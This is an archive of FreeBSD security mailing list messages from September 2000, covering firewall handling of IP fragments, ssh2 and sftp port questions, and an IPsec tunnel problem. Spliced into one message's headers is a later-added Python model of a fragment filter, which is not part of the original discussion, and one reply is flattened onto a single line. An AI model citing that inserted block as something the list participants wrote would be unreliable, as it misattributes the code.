> > based on how the PMTU caused the fragmentation at various points on the
> > path.
>
> Actually, isn't the purpose of PMTU to avoid the need to fragment the
> packet at intermediate routers? Since PMTU involves both endpoints of
> the link, thus allowing the originator to determine *if* a packet of a
> particular size can make it all the way from one end to the other w/out
> fragmentation.

You're thinking of PMTU discovery :-). PMTU is the Pathwise Maximum Transmission Unit. Assuming only single-path routing and a path in a particular direction between two nodes, it's the least member of the set of MTUs traversed between the two hosts. PMTU discovery allows nodes to determine the largest packet size they can send without undergoing fragmentation. It's an estimate, as the real PMTU is subject to routing and configuration changes, as well as the vagaries of multi-path routing.

My use of the term PMTU refers to the fact that although you can, in practice, treat the PMTU as constant, if a packet is sent that is too large, it may undergo multiple fragmentation in potentially fairly arbitrary ways, allowing no predictions to be made purely on knowledge of the PMTU.

> It seems that fragmentation is a real problem for stateless firewalls,
> but is a real problem that should be considered, especially since our
> existing IPFW is semi-stateful now. :)

Fragmentation is a problem for all firewalls, in as much as (a) ambiguities in the IP spec can cause problems, and (b) without reassembly, it's not clear how policies should apply to fragments. For application proxy firewalls with reassembly, fragmentation is generally not a serious problem, except from the DoS perspective. From the perspective of packet filters, fragmentation can have a variety of nasty effects, ranging from information leakage (referred to by the original poster) to fragmentation attacks that allow the attacker to pass straight through the firewall regardless of policy on the firewall. Many traditional packet filtering firewall products have simply passed fragments unhindered, relying on filtering on the first fragment to determine policy, assuming the host on the inside of the firewall will be able to handle all remaining cases. In practice, this works very poorly, and for an adequately knowledgeable attacker, is essentially like tissue paper from the protective perspective :-).

Robert N M Watson
robert@fledge.watson.org
http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

From owner-freebsd-security Sun Sep 3 18:19:35 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.kyx.net (cr95838-b.crdva1.bc.wave.home.com [24.113.50.147]) by hub.freebsd.org (Postfix) with ESMTP id 5D4D837B423; Sun, 3 Sep 2000 18:19:30 -0700 (PDT)
Received: from smp.kyx.net (unknown [10.22.22.45]) by mail.kyx.net (Postfix) with SMTP id A5A031DC03; Sun, 3 Sep 2000 18:18:32 -0700 (PDT)
From: Dragos Ruiu
Organization: kyx.net
To: Bill Fumerola , Darren Reed
Subject: Re: ipfw and fragments
Date: Sun, 3 Sep 2000 17:32:00 -0700
X-Mailer: KYX-CP/M [version core00-mail-92]
Content-Type: text/plain
Cc: Robert Watson , cjclark@alum.mit.edu, "Crist J . Clark" , Nicolas , freebsd-security@FreeBSD.ORG
References: <200009032010.HAA15013@cairo.anu.edu.au> <20000903173136.S33771@jade.chc-chimes.com>
In-Reply-To: <20000903173136.S33771@jade.chc-chimes.com>
MIME-Version: 1.0
Message-Id: <0009031819571V.20066@smp.kyx.net>
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, 03 Sep 2000, Bill Fumerola wrote:
> On Mon, Sep 04, 2000 at 07:10:46AM +1100, Darren Reed wrote:
>
> > It never reassembles and doesn't hold them in a buffer until they're
> > all received either.
>
> Which I still think is the proper behavior for both ipfw and ipfilter.
>

You don't have to buffer until they're reassembled. If you want to be rigorous, you may have to buffer in the case when you don't receive the first segment first (in which case you would have to buffer until you received the first fragment with the headers that will let the firewall decide if it should let the fragments through or not), but in practice this is an extreme corner case, so imho you can cheat a little and use a heuristic and say you won't buffer, and if you don't receive the first frag first, too bad (because in practice mis-sequencing almost never occurs in the wild). I don't know if there are any RFC rules regarding this anyway, so you may even be able to declare this correct behaviour. :-)

The only thing you have to store is which fragment addresses you've decided to let through. There is no actual reassembly (or buffering) necessary at the firewall level, just an additional lookup for fragments (and only fragments), but there is a need for some context and state through that lookup.

I've been looking at fragmentation for IDSes and my belief is that the performance impact of this feature can be similarly minimized or made negligible if designed correctly into firewalls too. Otherwise, we might as well try to change IP and ban IP level fragmentation, but who knows what breaks then....

And let me paint a scenario of why this might be important, because the future may see more fragmentation being used: to achieve high throughput rates without a ridiculous amount of packet overhead on the hosts for high speed networks (think 10GigE), many vendors are talking about increasing max ethernet frame sizes to 64k (I think some already support it). When dealing with monstergrams like that, being able to implement IP level fragmentation is a win for reducing implementation cost and translation. It's conjecture, but it may even become _necessary_ to use fragmentation for achieving high throughput (use large packet sizes) bridged over legacy smaller ethernet packets at the client interface.

I think that firewalls should deal with fragments correctly, because it may become more important in the future, and because the RFCs are written that way today. I'm planning on making sure the next firewall I build (which looks like it's going to be ipf based from what I've learned here) works correctly with regard to this, as to what the remainder of the net does... (But if any patches arise, I'll be glad to provide them to anyone else that shares my opinion about this. :-)

cheers,
--dr

--
dursec.com ltd. / kyx.net - we're from the future
pgp fingerprint: 18C7 E37C 2F94 E251 F18E B7DC 2B71 A73E D2E8 A56D
pgp key: http://www.dursec.com/drkey.asc

From owner-freebsd-security Sun Sep 3 18:32:30 2000
Delivered-To: freebsd-security@freebsd.org
Received: from blackstar.krsu.edu.kg (blackstar.krsu.edu.kg [195.254.161.130]) by hub.freebsd.org (Postfix) with ESMTP id C3A2B37B424 for ; Sun, 3 Sep 2000 18:32:23 -0700 (PDT)
Received: from krsu.edu.kg (krsu.edu.kg [195.254.164.3]) by blackstar.krsu.edu.kg (8.9.1a/8.9.1) with ESMTP id IAA09452; Thu, 10 Aug 2000 08:12:48 +0600 (KGST)
Received: from localhost (slash@localhost) by krsu.edu.kg (8.9.3/8.9.3) with ESMTP id HAA17311; Mon, 4 Sep 2000 07:35:39 +0600 (KGST) (envelope-from slash@krsu.edu.kg)
Date: Mon, 4 Sep 2000 07:35:39 +0600 (KGST)
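The fragment handling Dragos Ruiu describes in his message above (decide policy on the first fragment, remember the verdict, pass or drop later fragments by lookup alone, no reassembly and no buffering), written out as a small Python model. This is an added example, not code from ipfw, ipfilter or anyone on the thread; the Frag class, the FragFilter class, the sample fragments and the max_entries bound are all constructed for illustration. It also covers two points raised elsewhere in the thread: a first fragment too short to carry the transport ports (Robert Watson's point) gives the filter nothing to match on and is dropped, and the state table is bounded so that a flood of first fragments cannot grow it without limit (the DoS concern Nate Williams raises).

```python
from collections import OrderedDict
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class Frag:
    """Constructed model of one IP fragment: only the fields the filter reads."""
    src: str
    dst: str
    proto: int          # IP protocol number (6 = TCP, 17 = UDP)
    ident: int          # IP identification field, shared by all fragments of a datagram
    offset: int         # fragment offset in 8-byte units (0 = first fragment)
    more: bool          # MF flag: True unless this is the last fragment
    dport: Optional[int] = None   # transport destination port; None when the
                                  # fragment is too short to carry the transport header


Key = Tuple[str, str, int, int]   # (src, dst, proto, ident) identifies one datagram


class FragFilter:
    """Stateful fragment filter without reassembly (hypothetical, for illustration).

    Policy is decided once, on the first fragment (offset 0), which is the only
    fragment carrying the transport header. The verdict is remembered under
    (src, dst, proto, ident) so that later fragments are passed or dropped by a
    single lookup. The table is bounded: when it is full the oldest entry is
    evicted, so an attacker flooding first fragments cannot exhaust memory.
    """

    def __init__(self, allowed_dports, max_entries=1024):
        self.allowed_dports = set(allowed_dports)
        self.max_entries = max_entries
        self.verdicts = OrderedDict()   # Key -> bool, insertion ordered for eviction
        self.dropped_no_state = 0       # non-first fragments with no remembered verdict

    def _remember(self, key: Key, verdict: bool) -> None:
        if len(self.verdicts) >= self.max_entries:
            self.verdicts.popitem(last=False)   # evict the oldest entry
        self.verdicts[key] = verdict

    def decide(self, f: Frag) -> bool:
        """Return True to pass the fragment, False to drop it."""
        key = (f.src, f.dst, f.proto, f.ident)
        if f.offset == 0:
            # First fragment (or an unfragmented datagram): the only one that
            # can be matched on ports. A first fragment too short to hold the
            # transport header gives the filter nothing to match on, so it is
            # dropped, and so are its continuations.
            verdict = f.dport is not None and f.dport in self.allowed_dports
            if f.more:
                self._remember(key, verdict)
            return verdict
        # Non-first fragment: no transport header, so rely on the stored verdict.
        verdict = self.verdicts.get(key)
        if verdict is None:
            # Out-of-order or orphaned fragment: no buffering, just drop it
            # (the "if you don't receive the first frag first, too bad" heuristic).
            self.dropped_no_state += 1
            return False
        if not f.more:
            # Last fragment seen: the datagram is complete, forget its state.
            del self.verdicts[key]
        return verdict


def demo():
    """Run constructed sample fragments through a filter that allows UDP/53 only."""
    fw = FragFilter(allowed_dports={53})
    a, b = "192.0.2.10", "192.0.2.20"     # documentation addresses, constructed
    stream = [
        Frag(a, b, 17, 100, 0, True, dport=53),    # first fragment to DNS: allowed, remembered
        Frag(a, b, 17, 100, 185, False),           # last fragment of that datagram: passed by lookup
        Frag(a, b, 17, 200, 185, False),           # fragment whose first fragment was never seen: dropped
        Frag(a, b, 17, 300, 0, True, dport=None),  # first fragment too short to carry ports: dropped
        Frag(a, b, 17, 300, 1, False),             # its continuation inherits the drop verdict
        Frag(a, b, 6, 400, 0, True, dport=80),     # TCP to port 80 is not in the policy: dropped
        Frag(a, b, 6, 400, 185, False),            # and so is its continuation
    ]
    return [fw.decide(f) for f in stream]


if __name__ == "__main__":
    print(demo())
```

The trade-off the model makes visible is the one the thread argues about: a fragment that arrives before its first fragment is dropped rather than buffered, which keeps the filter free of per-datagram buffers and makes the only per-fragment cost one table lookup. If the last fragment arrives before a middle one, the state is already gone and the straggler is dropped too, which is the price of not buffering.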
From: CrazZzy Slash
To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Ssh2, sftp port Numbers ???
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Both clients ssh2 and scp connect to one daemon sshd2... and of course you can assign another port...

P.S. Sorry for bad English.. :)

On Sun, 3 Sep 2000, Ali Alaoui El Hassani wrote:

> Dear All,
> Thanx to your help successfully installed ssh2. Now I am confused about
> one thing. When I use ssh2 or sftp I see that they use the same port
> number which is 22. Hum?, my question is:
> How to distinguish between the two applications ssh2 and sftp?
> Is there any way for me to assign sftp another port number, say 199?
>
> I thank you in Advance
>
> Ali Alaoui El Hassani
>
> On Sun, 20 Aug 2000, CrazZzy Slash wrote:
>
> > Hi,
> >
> > Install /usr/ports/security/ssh2.
> >
> > On Sat, 19 Aug 2000, Ali Alaoui El Hassani wrote:
> >
> > Dear all,
> > I need to install
> > stlenet, sftp , shttp on a FreeBsd 3.3
> >
> > any Help?

--
Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86

From owner-freebsd-security Sun Sep 3 19:34:04 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 4F5EC37B424; Sun, 3 Sep 2000 19:34:02 -0700 (PDT)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id UAA24829; Sun, 3 Sep 2000 20:33:54 -0600 (MDT) (envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id UAA12035; Sun, 3 Sep 2000 20:33:53 -0600 (MDT) (envelope-from nate)
Date: Sun, 3 Sep 2000 20:33:53 -0600 (MDT)
Message-Id: <200009040233.UAA12035@nomad.yogotech.com>
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Bill Fumerola
Cc: Darren Reed , Robert Watson , Dragos Ruiu , cjclark@alum.mit.edu, "Crist J . Clark" , Nicolas , freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
In-Reply-To: <20000903173136.S33771@jade.chc-chimes.com>
References: <200009032010.HAA15013@cairo.anu.edu.au> <20000903173136.S33771@jade.chc-chimes.com>
X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > It never reassembles and doesn't hold them in a buffer until they're
> > all received either.
>
> Which I still think is the proper behavior for both ipfw and ipfilter.

I can think of some trivially easy DoS attacks if this is done...

Nate

From owner-freebsd-security Sun Sep 3 19:50:45 2000
Delivered-To: freebsd-security@freebsd.org
Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id DA84B37B423 for ; Sun, 3 Sep 2000 19:50:33 -0700 (PDT)
Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id CAA07850 for ; Mon, 4 Sep 2000 02:46:33 GMT
Date: Mon, 4 Sep 2000 02:46:32 +0000 (GMT)
From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
To: freebsd-security@FreeBSD.ORG
Subject: SOS Help ipsec (Esp Ah)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Dear All,

I am running into trouble. I am using tun0 as the tunnel of a secure communication via ESP. I also want to use AH as another reliable kind of communication, so I thought about using it via tun1. When I wanted to create tun1 (i.e. I went to GENERIC and modified the number of tunnels from 1 to 2) and recompile the kernel, I had a recompilation error due to some patch that I applied to my kernel previously. Well, the thing is that I can not use point to point links, i.e. sl0, pp0. Due to time limitations I can not reinstall another kernel.

My question is: do you have any idea on how I can get past this situation?

I thank you in advance,

Ali.

From owner-freebsd-security Sun Sep 3 20:15:37 2000
Delivered-To: freebsd-security@freebsd.org
Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id 9759B37B422 for ; Sun, 3 Sep 2000 20:15:32 -0700 (PDT)
Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id DAA07919; Mon, 4 Sep 2000 03:11:09 GMT
Date: Mon, 4 Sep 2000 03:11:09 +0000 (GMT)
From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
To: CrazZzy Slash
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Ssh2, sftp port Numbers ???
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Dear Sir,

Can you tell me how to assign different port numbers?

I thank you in advance,

Ali

On Mon, 4 Sep 2000, CrazZzy Slash wrote:

> Both clients ssh2 and scp connect to one daemon sshd2... and of course you
> can assign another port...
>
> P.S. Sorry for bad English.. :)
>
> On Sun, 3 Sep 2000, Ali Alaoui El Hassani wrote:
>
> > Dear All,
> > Thanx to your help successfully installed ssh2. Now I am confused about
> > one thing. When I use ssh2 or sftp I see that they use the same port
> > number which is 22. Hum?, my question is:
> > How to distinguish between the two applications ssh2 and sftp?
> > Is there any way for me to assign sftp another port number, say 199?
> >
> > I thank you in Advance
> >
> > Ali Alaoui El Hassani
> >
> > On Sun, 20 Aug 2000, CrazZzy Slash wrote:
> >
> > > Hi,
> > >
> > > Install /usr/ports/security/ssh2.
> > >
> > > On Sat, 19 Aug 2000, Ali Alaoui El Hassani wrote:
> > >
> > > Dear all,
> > > I need to install
> > > stlenet, sftp , shttp on a FreeBsd 3.3
> > >
> > > any Help?
>
> --
> Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86

From owner-freebsd-security Sun Sep 3 20:17:13 2000
Delivered-To: freebsd-security@freebsd.org
Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id CEB4137B42C for ; Sun, 3 Sep 2000 20:17:06 -0700 (PDT)
Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id DAA07931; Mon, 4 Sep 2000 03:12:50 GMT
Date: Mon, 4 Sep 2000 03:12:50 +0000 (GMT)
From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
To: CrazZzy Slash
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Ssh2, sftp port Numbers ???
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Dear Sir,

Can you tell me how to assign sftp, ssh and, say, slogin different port numbers?

On Mon, 4 Sep 2000, CrazZzy Slash wrote:

> Both clients ssh2 and scp connect to one daemon sshd2... and of course you
> can assign another port...
>
> P.S. Sorry for bad English.. :)
>
> On Sun, 3 Sep 2000, Ali Alaoui El Hassani wrote:
>
> > Dear All,
> > Thanx to your help successfully installed ssh2. Now I am confused about
> > one thing. When I use ssh2 or sftp I see that they use the same port
> > number which is 22. Hum?, my question is:
> > How to distinguish between the two applications ssh2 and sftp?
> > Is there any way for me to assign sftp another port number, say 199?
> >
> > I thank you in Advance
> >
> > Ali Alaoui El Hassani
> >
> > On Sun, 20 Aug 2000, CrazZzy Slash wrote:
> >
> > > Hi,
> > >
> > > Install /usr/ports/security/ssh2.
> > >
> > > On Sat, 19 Aug 2000, Ali Alaoui El Hassani wrote:
> > >
> > > Dear all,
> > > I need to install
> > > stlenet, sftp , shttp on a FreeBsd 3.3
> > >
> > > any Help?
>
> --
> Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86

From owner-freebsd-security Sun Sep 3 20:46:00 2000
Delivered-To: freebsd-security@freebsd.org
Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 45C9A37B423; Sun, 3 Sep 2000 20:45:56 -0700 (PDT)
Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id OAA24476; Mon, 4 Sep 2000 14:45:41 +1100 (EST)
From: Darren Reed
Message-Id: <200009040345.OAA24476@cairo.anu.edu.au>
Subject: Re: ipfw and fragments
To: nate@yogotech.com
Date: Mon, 4 Sep 2000 14:45:41 +1100 (Australia/NSW)
Cc: billf@chimesnet.com (Bill Fumerola), avalon@coombs.anu.edu.au (Darren Reed), rwatson@FreeBSD.ORG (Robert Watson), dr@kyx.net (Dragos Ruiu), cjclark@alum.mit.edu, cjclark@reflexnet.net (Crist J . Clark), list@rachinsky.de (Nicolas), freebsd-security@FreeBSD.ORG
In-Reply-To: <200009040233.UAA12035@nomad.yogotech.com> from "Nate Williams" at Sep 03, 2000 08:33:53 PM
X-Mailer: ELM [version 2.5 PL1]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In some mail from Nate Williams, sie said:
>
> > > It never reassembles and doesn't hold them in a buffer until they're
> > > all received either.
> >
> > Which I still think is the proper behavior for both ipfw and ipfilter.
>
> I can think of some trivially easy DoS attacks if this is done...

Ummm, what exactly would you be inflicting a DoS attack on ?

Darren

From owner-freebsd-security Sun Sep 3 21:05:48 2000
Delivered-To: freebsd-security@freebsd.org
Received: from blackstar.krsu.edu.kg (blackstar.krsu.edu.kg [195.254.161.130]) by hub.freebsd.org (Postfix) with ESMTP id 23DE637B422 for ; Sun, 3 Sep 2000 21:05:41 -0700 (PDT)
Received: from krsu.edu.kg (krsu.edu.kg [195.254.164.3]) by blackstar.krsu.edu.kg (8.9.1a/8.9.1) with ESMTP id KAA29989; Thu, 10 Aug 2000 10:46:14 +0600 (KGST)
Received: from localhost (slash@localhost) by krsu.edu.kg (8.9.3/8.9.3) with ESMTP id KAA18481; Mon, 4 Sep 2000 10:09:01 +0600 (KGST) (envelope-from slash@krsu.edu.kg)
Date: Mon, 4 Sep 2000 10:09:01 +0600 (KGST)
From: CrazZzy Slash
To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Ssh2, sftp port Numbers ???
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Different? For what? I mean you can assign another port number for sshd with the option

    sshd -p

P.S. Sorry for my bad English.. :)

On Mon, 4 Sep 2000, Ali Alaoui El Hassani wrote:

> Dear Sir,
> Can you tell me how to assign different port numbers?
>
> I thank you in advance
>
> Ali
>
> On Mon, 4 Sep 2000, CrazZzy Slash wrote:
>
> > Both clients ssh2 and scp connect to one daemon sshd2... and of course you
> > can assign another port...
> >
> > P.S. Sorry for bad English.. :)
> >
> > On Sun, 3 Sep 2000, Ali Alaoui El Hassani wrote:
> >
> > > Dear All,
> > > Thanx to your help successfully installed ssh2. Now I am confused about
> > > one thing. When I use ssh2 or sftp I see that they use the same port
> > > number which is 22. Hum?, my question is:
> > > How to distinguish between the two applications ssh2 and sftp?
> > > Is there any way for me to assign sftp another port number, say 199?
> > >
> > > I thank you in Advance
> > >
> > > Ali Alaoui El Hassani
> > >
> > > On Sun, 20 Aug 2000, CrazZzy Slash wrote:
> > >
> > > > Hi,
> > > >
> > > > Install /usr/ports/security/ssh2.
> > > >
> > > > On Sat, 19 Aug 2000, Ali Alaoui El Hassani wrote:
> > > >
> > > > Dear all,
> > > > I need to install
> > > > stlenet, sftp , shttp on a FreeBsd 3.3
> > > >
> > > > any Help?
> >
> > --
> > Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86

--
Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86

From owner-freebsd-security Sun Sep 3 21:05:59 2000
Delivered-To: freebsd-security@freebsd.org
Received: from blackstar.krsu.edu.kg (blackstar.krsu.edu.kg [195.254.161.130]) by hub.freebsd.org (Postfix) with ESMTP id BD4E237B42C for ; Sun, 3 Sep 2000 21:05:47 -0700 (PDT)
Received: from krsu.edu.kg (krsu.edu.kg [195.254.164.3]) by blackstar.krsu.edu.kg (8.9.1a/8.9.1) with ESMTP id KAA00139; Thu, 10 Aug 2000 10:46:21 +0600 (KGST)
Received: from localhost (slash@localhost) by krsu.edu.kg (8.9.3/8.9.3) with ESMTP id KAA18490; Mon, 4 Sep 2000 10:09:11 +0600 (KGST) (envelope-from slash@krsu.edu.kg)
Date: Mon, 4 Sep 2000 10:09:11 +0600 (KGST)
From: CrazZzy Slash To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> Cc: freebsd-security@FreeBSD.ORG Subject: Re: Ssh2, sftp port Numbers ??? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think you can't do it.. It's use the same sshd daemon.. of course you can run two sshd daemon on different ports and use one only for ssh and other only for scp.. :)) P.S. Sorry for my bad English.. :) On Mon, 4 Sep 2000, Ali Alaoui El Hassani wrote: > Dear Sir, > can you tell me about how to assign sftp and ssh and say slogin different > port numbers? > > > On Mon, 4 Sep 2000, CrazZzy Slash wrote: > > > Both clients ssh2 and scp connect to one daemon sshd2... and of course you > > can assign another port... > > > > P.S. Sorry for bad English.. :) > > > > On Sun, 3 Sep 2000, Ali Alaoui El Hassani wrote: > > > > > Dear All, > > > Thanx to your help successfully installed ssh2. Now i am confused about > > > one thing. When I use ssh2 or sftp I see that they use the same port > > > number which is 22. Hum?, my question is: > > > How to distinguish between the two applications ssh2 and sftp? > > > is there anyway for me to assign sftp another port number, say 199 ? > > > > > > I thank you in Advance > > > > > > Ali Alaoui El Hassani > > > > > > > > > > > > > > > > > > On Sun, 20 Aug 2000, CrazZzy Slash wrote: > > > > > > > Hi, > > > > > > > > Install /usr/ports/security/ssh2. > > > > > > > > > > > > On Sat, 19 Aug 2000, Ali Alaoui El Hassani wrote: > > > > > > > > Dear all, > > > > I need to install > > > > stlenet, sftp , shttp on a FreeBsd 3.3 > > > > > > > > any Help? 
> > > > --
> > > > Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86
>

--
Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Sep 3 21:39:20 2000
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 4D59F37B43C; Sun, 3 Sep 2000 21:39:18 -0700 (PDT)
Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 3 Sep 2000 21:38:03 -0700
Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.9.3/8.9.3) id VAA63203; Sun, 3 Sep 2000 21:39:04 -0700 (PDT) (envelope-from cjc)
Date: Sun, 3 Sep 2000 21:39:03 -0700
From: "Crist J . Clark"
To: Dragos Ruiu
Cc: Bill Fumerola , Darren Reed , Robert Watson , Nicolas , freebsd-security@FreeBSD.ORG
Subject: Re: ipfw and fragments
Message-ID: <20000903213903.Q62475@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References: <200009032010.HAA15013@cairo.anu.edu.au> <20000903173136.S33771@jade.chc-chimes.com> <0009031819571V.20066@smp.kyx.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <0009031819571V.20066@smp.kyx.net>; from dr@kyx.net on Sun, Sep 03, 2000 at 05:32:00PM -0700

On Sun, Sep 03, 2000 at 05:32:00PM -0700, Dragos Ruiu wrote:
> On Sun, 03 Sep 2000, Bill Fumerola wrote:
> > On Mon, Sep 04, 2000 at 07:10:46AM +1100, Darren Reed wrote:
> > >
> > > It never reassembles and doesn't hold them in a buffer until they're
> > > all received either.
> >
> > Which I still think is the proper behavior for both ipfw and ipfilter.
>
> You don't have to buffer until they're reassembled.

Hmmm... Wha'?

> If you want to be
> rigorous, you may have to buffer in the case when you don't receive
> the first segment first (in which case you would have to buffer until you
> received the first fragment with the headers that will let the firewall
> decide if it should let the fragments through or not) but in practice
> this is an extreme corner case, so imho, you can cheat a little
> and use a heuristic and say you won't buffer and if you don't receive
> the first frag first too bad (because in practice mis-sequencing
> almost never occurs in the wild) - I don't know if there are any
> RFC rules regarding this anyway, so you may even be able to
> declare this correct behaviour. :-)

See RFC791, sec 3.2 and RFC1122, sec 3.3.2, 3.3.3.

Oh, and a totally unrelated topic, whose MUA puts _both_ my
From: and Reply-To: addresses in the recipients ensuring that I have
received each message in this thread twice?
--
Crist J. Clark cjclark@alum.mit.edu

From owner-freebsd-security Sun Sep 3 21:44:19 2000
Received: from po4.wam.umd.edu (po4.wam.umd.edu [128.8.10.166]) by hub.freebsd.org (Postfix) with ESMTP id 545C437B43C for ; Sun, 3 Sep 2000 21:44:16 -0700 (PDT)
Received: from locust.wam.umd.edu (adsl-138-88-45-28.bellatlantic.net [138.88.45.28]) by po4.wam.umd.edu (8.9.3/8.9.3) with ESMTP id AAA08302 for ; Mon, 4 Sep 2000 00:44:15 -0400 (EDT)
Message-Id: <4.3.2.7.0.20000904004107.00b6deb8@pop.wam.umd.edu>
X-Sender: bmbintz@pop.wam.umd.edu
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Mon, 04 Sep 2000 00:41:18 -0400
To: freebsd-security@freebsd.org
From: Brian Bintz
Subject: subscribe
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed

subscribe

From owner-freebsd-security Sun Sep 3 22:16: 5 2000
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 2BB8A37B424 for ; Sun, 3 Sep 2000 22:16:04 -0700 (PDT)
Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 3 Sep 2000 22:14:58 -0700
Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.9.3/8.9.3) id WAA63472; Sun, 3 Sep 2000 22:15:56 -0700 (PDT) (envelope-from cjc)
Date: Sun, 3 Sep 2000 22:15:56 -0700
From: "Crist J . Clark"
To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SOS Help ipsec (Esp Ah)
Message-ID: <20000903221556.R62475@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: ; from 961BE653994@stud.alakhawayn.ma on Mon, Sep 04, 2000 at 02:46:32AM +0000

On Mon, Sep 04, 2000 at 02:46:32AM +0000, Ali Alaoui El Hassani wrote:
>
> Dear All,
>
> I am running into trouble. I am using tun0 as tunnel of a secure
> communication via ESP. I want also to use AH as another reliable kind of
> communication so I thought about using it via tun1. When I wanted to
> create tun1, i.e. (I went to GENERIC and modified the number of tunnels
> from 1 to 2) and I wanted to recompile the kernel, I had a recompilation
> error due to some patch that I applied to my kernel previously.
> Well the thing is that I can not use point to point links i.e. sl0, pp0.
> Due to time limitations I can not reinstall another kernel.
>
> My question is:
> Do you have any idea on how I can overpass this situation ?

Well, you should not need tun(4) devices at all to do IPsec.
--
Crist J. Clark cjclark@alum.mit.edu

From owner-freebsd-security Mon Sep 4 5:44:41 2000
